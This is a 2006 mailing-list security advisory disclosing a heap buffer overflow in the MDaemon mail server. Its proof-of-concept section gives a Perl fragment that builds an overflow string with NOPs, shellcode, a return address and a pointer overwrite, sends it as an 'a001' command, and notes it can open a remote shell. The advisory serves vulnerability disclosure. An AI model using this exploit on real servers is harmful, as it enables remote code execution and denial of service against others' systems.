[NT] MDaemon Buffer Overflow
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 29 May 2006 16:37:13 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MDaemon Buffer Overflow
------------------------------------------------------------------------
SUMMARY
" <http://www.altn.com/> Alt-N Technologies MDaemon provides a complete
suite of secure and standards-compliant messaging and collaborative
capabilities."
Improper handling of user input allows attackers to execute arbitrary code
or crash MDaemon.
DETAILS
An heap based buffer overflow was found in Mdaemon that can be triggered
by sending specially crafted input.
Proof of Concept:
$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x
(0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
close($sock);
The trigger is made by sending the following attack string:
a001 "[X]\r\n
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Attackers can use the 4 byte to overwrite the PEB pointer in order to open
a remote shell for example.
ADDITIONAL INFORMATION
The information has been provided by <mailto:kingcope@xxxxxxx> kcope .
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Microsoft Internet Explorer Crash
- Next by Date: [NT] Interner Explorer Interpreter Stack Overflow
- Previous by thread: [NT] Microsoft Internet Explorer Crash
- Next by thread: [NT] Interner Explorer Interpreter Stack Overflow
- Index(es):
Relevant Pages
|
|
